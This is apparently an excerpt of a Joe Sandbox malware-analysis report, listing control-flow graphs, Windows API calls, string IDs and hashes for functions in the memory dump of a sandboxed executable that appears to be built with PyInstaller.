                                                                                                      control_flow_graph 901 7ff75714ba5c-7ff75714ba82 902 7ff75714ba9d-7ff75714baa1 901->902 903 7ff75714ba84-7ff75714ba98 call 7ff757144ee8 call 7ff757144f08 901->903 904 7ff75714be77-7ff75714be83 call 7ff757144ee8 call 7ff757144f08 902->904 905 7ff75714baa7-7ff75714baae 902->905 917 7ff75714be8e 903->917 924 7ff75714be89 call 7ff75714a8e0 904->924 905->904 908 7ff75714bab4-7ff75714bae2 905->908 908->904 911 7ff75714bae8-7ff75714baef 908->911 914 7ff75714bb08-7ff75714bb0b 911->914 915 7ff75714baf1-7ff75714bb03 call 7ff757144ee8 call 7ff757144f08 911->915 920 7ff75714be73-7ff75714be75 914->920 921 7ff75714bb11-7ff75714bb17 914->921 915->924 922 7ff75714be91-7ff75714bea8 917->922 920->922 921->920 925 7ff75714bb1d-7ff75714bb20 921->925 924->917 925->915 928 7ff75714bb22-7ff75714bb47 925->928 929 7ff75714bb49-7ff75714bb4b 928->929 930 7ff75714bb7a-7ff75714bb81 928->930 932 7ff75714bb4d-7ff75714bb54 929->932 933 7ff75714bb72-7ff75714bb78 929->933 934 7ff75714bb83-7ff75714bbab call 7ff75714d5fc call 7ff75714a948 * 2 930->934 935 7ff75714bb56-7ff75714bb6d call 7ff757144ee8 call 7ff757144f08 call 7ff75714a8e0 930->935 932->933 932->935 937 7ff75714bbf8-7ff75714bc0f 933->937 962 7ff75714bbad-7ff75714bbc3 call 7ff757144f08 call 7ff757144ee8 934->962 963 7ff75714bbc8-7ff75714bbf3 call 7ff75714c284 934->963 966 7ff75714bd00 935->966 940 7ff75714bc8a-7ff75714bc94 call 7ff75715391c 937->940 941 7ff75714bc11-7ff75714bc19 937->941 953 7ff75714bd1e 940->953 954 7ff75714bc9a-7ff75714bcaf 940->954 941->940 945 7ff75714bc1b-7ff75714bc1d 941->945 945->940 949 7ff75714bc1f-7ff75714bc35 945->949 949->940 955 7ff75714bc37-7ff75714bc43 949->955 957 7ff75714bd23-7ff75714bd43 ReadFile 953->957 954->953 959 7ff75714bcb1-7ff75714bcc3 GetConsoleMode 954->959 955->940 960 7ff75714bc45-7ff75714bc47 955->960 964 7ff75714be3d-7ff75714be46 GetLastError 957->964 965 7ff75714bd49-7ff75714bd51 957->965 959->953 967 7ff75714bcc5-7ff75714bccd 959->967 960->940 961 7ff75714bc49-7ff75714bc61 960->961 961->940 968 7ff75714bc63-7ff75714bc6f 961->968 962->966 963->937 973 7ff75714be48-7ff75714be5e call 7ff757144f08 call 7ff757144ee8 964->973 974 7ff75714be63-7ff75714be66 964->974 965->964 970 7ff75714bd57 965->970 975 7ff75714bd03-7ff75714bd0d call 7ff75714a948 966->975 967->957 972 7ff75714bccf-7ff75714bcf1 ReadConsoleW 967->972 968->940 977 7ff75714bc71-7ff75714bc73 968->977 981 7ff75714bd5e-7ff75714bd73 970->981 983 7ff75714bcf3 GetLastError 972->983 984 7ff75714bd12-7ff75714bd1c 972->984 973->966 978 7ff75714be6c-7ff75714be6e 974->978 979 7ff75714bcf9-7ff75714bcfb call 7ff757144e7c 974->979 975->922 977->940 987 7ff75714bc75-7ff75714bc85 977->987 978->975 979->966 981->975 989 7ff75714bd75-7ff75714bd80 981->989 983->979 984->981 987->940 994 7ff75714bda7-7ff75714bdaf 989->994 995 7ff75714bd82-7ff75714bd9b call 7ff75714b674 989->995 998 7ff75714be2b-7ff75714be38 call 7ff75714b4b4 994->998 999 7ff75714bdb1-7ff75714bdc3 994->999 1001 7ff75714bda0-7ff75714bda2 995->1001 998->1001 1002 7ff75714be1e-7ff75714be26 999->1002 1003 7ff75714bdc5 999->1003 1001->975 1002->975 1005 7ff75714bdca-7ff75714bdd1 1003->1005 1006 7ff75714be0d-7ff75714be18 1005->1006 1007 7ff75714bdd3-7ff75714bdd7 1005->1007 1006->1002 1008 7ff75714bdd9-7ff75714bde0 1007->1008 1009 7ff75714bdf3 1007->1009 1008->1009 1010 7ff75714bde2-7ff75714bde6 1008->1010 1011 7ff75714bdf9-7ff75714be09 1009->1011 1010->1009 1012 7ff75714bde8-7ff75714bdf1 1010->1012 1011->1005 1013 7ff75714be0b 1011->1013 1012->1011 1013->1002
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
                                                                                                      • Instruction ID: 41e6365d23d076e6898d28d055058e56d32ecf48765dac33eb9e694d1d0848a9
                                                                                                      • Opcode Fuzzy Hash: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
                                                                                                      • Instruction Fuzzy Hash: 61C1F522D0C68E81EE70AB15B5422BDB762EBC1B94FDD0131EA4D17791EE7EE4478720

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                      • String ID:
                                                                                                      • API String ID: 995526605-0
                                                                                                      • Opcode ID: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                      • Instruction ID: 54dcdacf34bfb4cf58f9e3341d95ea0246fd7e6bee094189f36aa8ddcd140c03
                                                                                                      • Opcode Fuzzy Hash: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                      • Instruction Fuzzy Hash: DE212571A0C64E41EF50AB59F54463AE3A1FFC57A0FD80235EA6D436E4DE7CD4468B20

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 00007FF757138570: GetCurrentProcess.KERNEL32 ref: 00007FF757138590
                                                                                                        • Part of subcall function 00007FF757138570: OpenProcessToken.ADVAPI32 ref: 00007FF7571385A3
                                                                                                        • Part of subcall function 00007FF757138570: GetTokenInformation.KERNELBASE ref: 00007FF7571385C8
                                                                                                        • Part of subcall function 00007FF757138570: GetLastError.KERNEL32 ref: 00007FF7571385D2
                                                                                                        • Part of subcall function 00007FF757138570: GetTokenInformation.KERNELBASE ref: 00007FF757138612
                                                                                                        • Part of subcall function 00007FF757138570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF75713862E
                                                                                                        • Part of subcall function 00007FF757138570: CloseHandle.KERNEL32 ref: 00007FF757138646
                                                                                                      • LocalFree.KERNEL32(?,00007FF757133C55), ref: 00007FF75713916C
                                                                                                      • LocalFree.KERNEL32(?,00007FF757133C55), ref: 00007FF757139175
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                      • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                      • API String ID: 6828938-1529539262
                                                                                                      • Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                      • Instruction ID: cc741d097c9d568d803abcc0da2a6ba8242a9b3a5f7c265644a994e1787dd0ff
                                                                                                      • Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                      • Instruction Fuzzy Hash: D2214F21A0864A86FE14BB10F5552EAA261FFC8780FD84035EA4E57796DF3CD94687A0
                                                                                                      APIs
                                                                                                      • CreateDirectoryW.KERNELBASE(00000000,?,00007FF75713352C,?,00000000,00007FF757133F23), ref: 00007FF757137F32
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateDirectory
                                                                                                      • String ID: %.*s$%s%c$\
                                                                                                      • API String ID: 4241100979-1685191245
                                                                                                      • Opcode ID: 9023beffec3a57a4629e8abb22503f1b718fcdb28fa34784c50d465fb9ddbb72
                                                                                                      • Instruction ID: 6a89e239ca05150f4f4516a8f55be37306769deb1166d31fbc417c982332af66
                                                                                                      • Opcode Fuzzy Hash: 9023beffec3a57a4629e8abb22503f1b718fcdb28fa34784c50d465fb9ddbb72
                                                                                                      • Instruction Fuzzy Hash: C1319821719ACD85EE21AB21F4507AAA354FBC4BE4F880231EE6D47BC9DF3CD6468710
                                                                                                      APIs
                                                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF75714CF4B), ref: 00007FF75714D07C
                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF75714CF4B), ref: 00007FF75714D107
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleErrorLastMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 953036326-0
                                                                                                      • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                      • Instruction ID: d454b1bb63b76710533e4fbd861c7a7cf77006efbe0cc083b2eeeda3564eb0d0
                                                                                                      • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                      • Instruction Fuzzy Hash: 3491E632F0866945FF60AF75A44167DA7A1AB80BC8F984135DE4E17A84EE3CD443C720
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _get_daylight$_isindst
                                                                                                      • String ID:
                                                                                                      • API String ID: 4170891091-0
                                                                                                      • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                      • Instruction ID: d78128d33fb3204b8f58da89af996c561ad9783521bf348de1cd5bbba0be2b21
                                                                                                      • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                      • Instruction Fuzzy Hash: 8A5129B2F041198AFF14EF64A9522BCA7A6AB85358F9C0235DD1D52BD4EF38A503C710
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                      • String ID:
                                                                                                      • API String ID: 2780335769-0
                                                                                                      • Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                      • Instruction ID: 616bacb0e037589e5a1bfeb469156aa29629175f13adc300fb538a8ec96fca21
                                                                                                      • Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                      • Instruction Fuzzy Hash: C5519422E046458AFF14EF72E4523BD77B2AB88B58F984434DE0D57688EF78D4428720
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279662727-0
                                                                                                      • Opcode ID: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
                                                                                                      • Instruction ID: af15644fc5b98f383a906d30356c8295e32dc2e30b8845d7a1c2513ec9730ee5
                                                                                                      • Opcode Fuzzy Hash: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
                                                                                                      • Instruction Fuzzy Hash: 7B41E662D1878583EB50AB21A511379B362FBD5764F948334EA5C03AD1EFBCA1E28710
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                      • String ID:
                                                                                                      • API String ID: 3251591375-0
                                                                                                      • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                      • Instruction ID: a0a146558db8ac572bcff417a5deae6d734a4d9a9c9818b5bccdf3a3d879f03e
                                                                                                      • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                      • Instruction Fuzzy Hash: 95311721E0814F45FE24BF65B5163B9A692AFC1384FDC5034E94E4B2D7DE2DA9078371
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                      • String ID:
                                                                                                      • API String ID: 1703294689-0
                                                                                                      • Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                      • Instruction ID: e8a9f0c8a016821b1ef4e43de6f45485a7463b593c48280d6c554ecd34753a10
                                                                                                      • Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                      • Instruction Fuzzy Hash: CAD06711F0870E42EE687B74799A07892566FC9B41FE81438D88B16393ED2CA84B4660
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                      • Instruction ID: 8b60f0ae867a9b702dc29547df87d1af20efbb0a2e2c9483363de4cfff5764d1
                                                                                                      • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                      • Instruction Fuzzy Hash: 0F51EB61F0964986EF24BA37B50267AE692AFC4BA4F9C4634DD6D037C5FE3CD5028620
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                      • String ID:
                                                                                                      • API String ID: 2976181284-0
                                                                                                      • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                      • Instruction ID: a34254b1ae3b1b62114b477472a43a76a18295660e4bcb9a51f707fe2e7961d5
                                                                                                      • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                      • Instruction Fuzzy Hash: 4811C461B08B8581DE20AB25B815169E362BB85FF4F984331EE7D0B7D9DE7CD0528700
                                                                                                      APIs
                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF757145839), ref: 00007FF757145957
                                                                                                      • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF757145839), ref: 00007FF75714596D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Time$System$FileLocalSpecific
                                                                                                      • String ID:
                                                                                                      • API String ID: 1707611234-0
                                                                                                      • Opcode ID: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
                                                                                                      • Instruction ID: 10cec4212bfc3163ff2a258cafb5fd37b13b10eca85a2e9a1200eeaa6ef4b3d3
                                                                                                      • Opcode Fuzzy Hash: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
                                                                                                      • Instruction Fuzzy Hash: 74118221A0C64681EE546B15F81113AF761FBC5771FD80236F699819D8FF6CD415DB20
                                                                                                      APIs
                                                                                                      • RtlFreeHeap.NTDLL(?,?,?,00007FF757152D22,?,?,?,00007FF757152D5F,?,?,00000000,00007FF757153225,?,?,?,00007FF757153157), ref: 00007FF75714A95E
                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF757152D22,?,?,?,00007FF757152D5F,?,?,00000000,00007FF757153225,?,?,?,00007FF757153157), ref: 00007FF75714A968
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF757172000.00000004.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498607725.00007FF757174000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff757130000_ ? .jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 485612231-0
                                                                                                      • Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                      • Instruction ID: 42d33124064ec19e8665143a2725e1d62c072fe3a6f9a5233f38ec6f0c067480
                                                                                                      • Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                      • Instruction Fuzzy Hash: EAE08C50F1960A82FF197BF2BC4617992926FC8B00FCD0034CD0D562A1FE2C68838730
                                                                                                      APIs
                                                                                                      • CloseHandle.KERNELBASE(?,?,?,00007FF75714A9D5,?,?,00000000,00007FF75714AA8A), ref: 00007FF75714ABC6
                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF75714A9D5,?,?,00000000,00007FF75714AA8A), ref: 00007FF75714ABD0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2498358865.00007FF757131000.00000020.00000001.01000000.0000001C.sdmp, Offset: 00007FF757130000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2498331252.00007FF757130000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498432541.00007FF75715B000.00000002.00000001.01000000.0000001C.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2498474148.00007FF75716E000.00000004.00000001.01000000.0000001C.sdmpDownload File
